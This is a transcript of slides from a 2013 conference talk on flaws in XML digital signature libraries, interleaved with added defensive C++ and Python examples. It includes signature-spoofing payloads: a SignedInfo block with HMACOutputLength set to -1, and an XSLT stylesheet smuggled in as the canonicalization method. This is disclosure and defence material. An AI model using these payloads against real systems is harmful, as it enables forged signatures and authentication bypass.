![Page 98: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/98.jpg)
Div Function
HMACOutputLength = -1
maxCompare = 0xFFFFFFFF
d.quot = 0, d.rem = -1
maxBytes = 0, maxBits = 0xFFFFFFFF
![Page 100: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/100.jpg)
Exploiting
<SignedInfo>
  <CanonicalizationMethod Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
  <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#hmac-sha1">
    <HMACOutputLength>-1</HMACOutputLength>
  </SignatureMethod>
  ...
</SignedInfo>

00112233445566778899AABBCCDDEEFF00112233
Truncate to 8 bits
00
![Page 101: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/101.jpg)
DoS Only
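The length handling walked through above, as an added example that is not the library's code: it reproduces the `atoi`, unsigned conversion and `div()` arithmetic from the slides, then shows a stricter parse. The function names and the acceptance policy in `parseHmacOutputLength` are assumptions made for illustration; all lengths are in bits.

```cpp
#include <cerrno>
#include <climits>
#include <cstdlib>
#include <iostream>

// Path on the slides: atoi() into an int member, later passed as unsigned int.
unsigned int slideParse(const char* text) {
    int asInt = std::atoi(text);
    return static_cast<unsigned int>(asInt);   // "-1" becomes UINT_MAX
}

// The CVE-2009-0217 check from the slides, returning false where it would throw.
bool slideCheckAccepts(unsigned int outputLen, unsigned int hashLen) {
    if (outputLen > 0 && (outputLen < 80 || outputLen < hashLen / 2)) return false;
    return true;
}

struct CompareBounds {
    unsigned int maxBytes;
    unsigned int maxBits;
};

// Arithmetic of compareBase64StringToRaw(): div() works on int, so the value
// goes back to a signed int (made explicit here with a cast) before dividing.
CompareBounds slideBounds(unsigned int maxCompare, unsigned int rawLen) {
    if (maxCompare == 0) maxCompare = rawLen;
    std::div_t d = std::div(static_cast<int>(maxCompare), 8);
    CompareBounds b;
    b.maxBytes = static_cast<unsigned int>(d.quot);   // -1 / 8 truncates to 0
    b.maxBits = static_cast<unsigned int>(d.rem);     // -1 % 8 is -1, i.e. UINT_MAX
    return b;
}

// Stricter parse (assumed policy): decimal digits only, a whole number of
// bytes, at least 80 bits and half the hash, at most the hash length.
// Returns the length in bits, or -1 if the value is rejected.
long parseHmacOutputLength(const char* text, unsigned int hashBits) {
    if (text == NULL || *text == '\0') return -1;
    for (const char* p = text; *p != '\0'; ++p)
        if (*p < '0' || *p > '9') return -1;           // rejects "-1", "+80", " 80"
    errno = 0;
    unsigned long v = std::strtoul(text, NULL, 10);
    if (errno == ERANGE || v > hashBits) return -1;
    if (v % 8 != 0 || v < 80 || v < hashBits / 2) return -1;
    return static_cast<long>(v);
}

int main() {
    unsigned int len = slideParse("-1");
    CompareBounds b = slideBounds(len, 160);
    std::cout << "slide path: outputLen=" << len
              << " accepted=" << slideCheckAccepts(len, 160)
              << " maxBytes=" << b.maxBytes
              << " maxBits=" << b.maxBits << "\n"
              << "strict parse of \"-1\": " << parseHmacOutputLength("-1", 160) << "\n"
              << "strict parse of \"80\": " << parseHmacOutputLength("80", 160) << "\n";
    return 0;
}
```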
![Page 107: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/107.jpg)
Non-Constant Time Compare
bool compareBits(const unsigned char* outputStr,
                 const unsigned char* raw,
                 unsigned int maxBytes,
                 unsigned int maxBits) {
    unsigned int i, j;
    for (i = 0; i < maxBytes; ++ i) {
        if (raw[i] != outputStr[i])
            return false;
    }

    char mask = 0x01;
    for (j = 0 ; j < maxBits; ++i) {    // increments i, not j
        if ((raw[i] & mask) != (outputStr[i] & mask))
            return false;
        mask = mask << 1;
    }
    return true;
}

// Mono
bool Compare (byte[] expected, byte[] actual) {
    for (int i=0; i < l; i++) {
        if (expected[i] != actual[i])
            return false;
    }
    return true;
}

// .NET
bool CheckSignedInfo(KeyedHashAlgorithm macAlg) {
    for (int i = 0; i < this.m_signature.SignatureValue.Length; i++) {
        if (m_signature.SignatureValue[i] != actualHashValue[i]) {
            return false;
        }
    }
    return true;
}

// XMLSEC1
if ((dataSize > 1) && (memcmp(ctx->dgst, data, dataSize - 1) != 0)) {
    transform->status = xmlSecTransformStatusFail;
    return(0);
}
transform->status = xmlSecTransformStatusOk;
return(0);
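What the early return in these loops exposes, and a comparison without it, as an added example that is not code from any of the libraries above. The function names and the candidate values are constructed for illustration; the 20-byte expected value is the sample from the truncation slides.

```cpp
#include <cstddef>
#include <iostream>

// Sample MAC value as shown on the truncation slides.
static const unsigned char kExpected[20] = {
    0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99,
    0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF, 0x00, 0x11, 0x22, 0x33
};

// Early-exit loop shaped like the compare routines above, instrumented to
// report how many bytes it examined before returning.
std::size_t earlyExitBytesExamined(const unsigned char* expected,
                                   const unsigned char* actual,
                                   std::size_t n) {
    std::size_t examined = 0;
    for (std::size_t i = 0; i < n; ++i) {
        ++examined;
        if (expected[i] != actual[i]) break;   // work done depends on the data
    }
    return examined;
}

// Accumulates differences over every byte, so the amount of work does not
// depend on where (or whether) the inputs differ. n is the already validated
// number of bytes to compare.
bool constantTimeEqual(const unsigned char* a, const unsigned char* b, std::size_t n) {
    unsigned char diff = 0;
    for (std::size_t i = 0; i < n; ++i)
        diff |= static_cast<unsigned char>(a[i] ^ b[i]);
    return diff == 0;
}

// Constructed candidate: the first correctPrefix bytes match, the rest are flipped.
static void makeCandidate(std::size_t correctPrefix, unsigned char out[20]) {
    for (std::size_t i = 0; i < 20; ++i)
        out[i] = (i < correctPrefix) ? kExpected[i]
                                     : static_cast<unsigned char>(kExpected[i] ^ 0xFF);
}

std::size_t examinedForPrefix(std::size_t correctPrefix) {
    unsigned char candidate[20];
    makeCandidate(correctPrefix, candidate);
    return earlyExitBytesExamined(kExpected, candidate, 20);
}

bool constantTimeResultForPrefix(std::size_t correctPrefix) {
    unsigned char candidate[20];
    makeCandidate(correctPrefix, candidate);
    return constantTimeEqual(kExpected, candidate, 20);
}

int main() {
    for (std::size_t prefix = 0; prefix <= 20; prefix += 5)
        std::cout << "matching prefix " << prefix
                  << ": early-exit examined " << examinedForPrefix(prefix)
                  << " bytes, constant-time equal = "
                  << constantTimeResultForPrefix(prefix) << "\n";
    return 0;
}
```

In production code, prefer a vetted primitive such as OpenSSL's `CRYPTO_memcmp` over a hand-written loop, since a compiler is free to optimise the accumulator pattern.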
![Page 108: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/108.jpg)
Back to the original story...
![Page 109: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/109.jpg)
CVE-2013-1336/CVE-2013-2172/CVE-2013-2461
• Signature Spoofing through Canonicalization Algorithm Identifier
• Affected .NET, Apache Java and JRE
• Doesn't work in Mono, due to an "Incompatible Implementation"
![Page 110: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/110.jpg)
SignedInfo Element
<SignedInfo>
  <CanonicalizationMethod Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
  <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
  <Reference URI="">
    <Transforms>
      <Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
    </Transforms>
    <DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
    <DigestValue>C2pG...</DigestValue>
  </Reference>
</SignedInfo>
![Page 113: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/113.jpg)
Algorithm Identifiers

| Name | Type | URI | Required? |
|---|---|---|---|
| SHA1 | Digest | http://www.w3.org/2000/09/xmldsig#sha1 | Yes |
| Base64 | Encoding | http://www.w3.org/2000/09/xmldsig#base64 | Yes |
| HMAC/SHA1 | Signature | http://www.w3.org/2000/09/xmldsig#hmac-sha1 | Yes |
| DSA/SHA1 | Signature | http://www.w3.org/2000/09/xmldsig#dsa-sha1 | Yes |
| RSA/SHA1 | Signature | http://www.w3.org/2000/09/xmldsig#rsa-sha1 | No |
| C14N 1.0 | C14N | http://www.w3.org/TR/2001/REC-xml-c14n-20010315 | Yes |
| C14N 1.1 | C14N | http://www.w3.org/2006/12/xml-c14n11 | Yes |
| Envelope | Transform | http://www.w3.org/2000/09/xmldsig#enveloped-signature | Yes |
| XPath | Transform | http://www.w3.org/TR/1999/REC-xpath-19991116 | No |
| XSLT | Transform | http://www.w3.org/TR/1999/REC-xslt-19991116 | No |
![Page 114: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/114.jpg)
Extensible?
http://www.w3.org/TR/xmldsig-core/#sec-AlgID
"This specification defines a set of algorithms, their URIs, and requirements for implementation. Requirements are specified over implementation, not over requirements for signature use. Furthermore, the mechanism is extensible; alternative algorithms may be used by signature applications."
![Page 115: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/115.jpg)
Creating .NET Canonicalizer
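class SignedInfo {
    // Algorithm URI as read from the document's <CanonicalizationMethod> element
    public string CanonicalizationMethod { get; }

    public Transform CanonicalizationMethodObject {
        get {
            // Whatever CryptoConfig creates for that name is only cast to Transform
            return (Transform)CryptoConfig.CreateFromName(this.CanonicalizationMethod);
        }
    }
}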
![Page 117: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/117.jpg)
CryptoConfig?
![Page 119: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/119.jpg)
Derived from Transform
![Page 125: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/125.jpg)
Exploiting It
Good Signed XML Document
<good/>
<SignedInfo>
<CanonicalizationMethod/><SignatureMethod/>
<Reference URI="#id">
<Transforms/><DigestMethod/><DigestValue>C2pG...</DigestValue>
</Reference>
</SignedInfo>
Extract, Canonicalize, To XSLT
<xsl:stylesheet version="1.0">
<xsl:output method="text" />
<xsl:template match="/">
<xsl:text disable-output-escaping="yes"><SignedInfo xmlns="http://...</xsl:text>
</xsl:template>
</xsl:stylesheet>
Modify Document
Bad Signed XML Document
<bad/>
![Page 126: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/126.jpg)
Final XML
<SignedInfo><CanonicalizationMethod Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" /><xsl:template match="/">
<xsl:text disable-output-escaping="yes"><SignedInfo xmlns="http://...
</xsl:text></xsl:template>
</xsl:stylesheet></CanonicalizationMethod><SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1" />
</SignedInfo>
![Page 127: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/127.jpg)
And the Rest
• Cross Implementation DoS (can't show at this time).
– Also allows you to steal files
• Invalid Parsing of Signatures
– Blended Threat between parsers
• Other DoS stuff in .NET and WCF
• Many Lucky "bugs" in Mono
![Page 128: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/128.jpg)
Final Score Sheet

| Implementation | Parsing Issues | Memory Corruption | Signature Spoofing | Denial of Service | File Stealing |
|---|---|---|---|---|---|
| Apache C++ | Yes | Yes | Yes | Yes | Yes, hilariously! |
| Apache Java/JRE | Yes | No | Yes | Yes | Sort of, limited use |
| XMLSEC1 | No | No | Yes | Yes if libxml2 isn't fixed | No |
| .NET | No | No | Yes | Yes | Yes |
| Mono | Lucky Escape | No | Yes, should have been worse | Yes | I gave up even trying |
![Page 129: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/129.jpg)
Demo Time!
![Page 130: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/130.jpg)
Conclusions
• Don't Blindly Trust Your Implementation
• Double Check All References are as expected
• Double Check All Algorithms are as expected
• Probably stay away from Apache C++ and Mono
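The two "Double Check" conclusions can be enforced by the application before it hands the document to its XML signature library. The Python code below is an added example, not code from the talk: the EXPECTED policy (built from the identifiers on the slides; substitute the algorithms your deployment actually uses), the function names and the sample documents are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

DS = "http://www.w3.org/2000/09/xmldsig#"
NS = {"ds": DS}
# Assumed verifier policy: one exact algorithm URI per role (identifiers from the slides).
EXPECTED = {
    "CanonicalizationMethod": "http://www.w3.org/TR/2001/REC-xml-c14n-20010315",
    "SignatureMethod": DS + "rsa-sha1",
    "DigestMethod": DS + "sha1",
    "Transform": DS + "enveloped-signature",
}

def _unexpected(el, role):
    # A wrong URI or any child content (such as an embedded stylesheet) is a violation.
    return el.get("Algorithm") != EXPECTED[role] or len(el) > 0

def policy_violations(xml_text, expected_ref=""):
    """Return reasons to refuse the document before the library verifies it."""
    root = ET.fromstring(xml_text)
    sigs = list(root.iter("{%s}Signature" % DS))
    info = sigs[0].find("ds:SignedInfo", NS) if len(sigs) == 1 else None
    if info is None:
        return ["expected exactly one Signature containing a SignedInfo"]
    out = []
    for role in ("CanonicalizationMethod", "SignatureMethod"):
        els = info.findall("ds:" + role, NS)
        if len(els) != 1 or _unexpected(els[0], role):
            out.append(role + " is not the expected algorithm")
    refs = info.findall("ds:Reference", NS)
    if [r.get("URI") for r in refs] != [expected_ref]:
        out.append("References are not exactly the expected one")
    for ref in refs:
        digests = ref.findall("ds:DigestMethod", NS)
        if len(digests) != 1 or _unexpected(digests[0], "DigestMethod"):
            out.append("DigestMethod is not the expected algorithm")
        if any(_unexpected(t, "Transform") for t in ref.findall("ds:Transforms/ds:Transform", NS)):
            out.append("Transform is not the expected algorithm")
    return out

def _doc(c14n, body=""):  # constructed sample; digest and signature values are dummies
    return ('<doc><Signature xmlns="{d}"><SignedInfo><CanonicalizationMethod Algorithm="{c}">{b}'
            '</CanonicalizationMethod><SignatureMethod Algorithm="{d}rsa-sha1"/><Reference URI="">'
            '<Transforms><Transform Algorithm="{d}enveloped-signature"/></Transforms>'
            '<DigestMethod Algorithm="{d}sha1"/><DigestValue>AAAA</DigestValue></Reference>'
            '</SignedInfo><SignatureValue>AAAA</SignatureValue></Signature></doc>').format(d=DS, c=c14n, b=body)

GOOD = _doc(EXPECTED["CanonicalizationMethod"])
XSLT_C14N = _doc("http://www.w3.org/TR/1999/REC-xslt-19991116",
                 '<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"/>')
```

This check covers algorithm and reference policy only; parser hardening against the denial-of-service issues in the score sheet is a separate control.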
![Page 131: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/131.jpg)
Questions?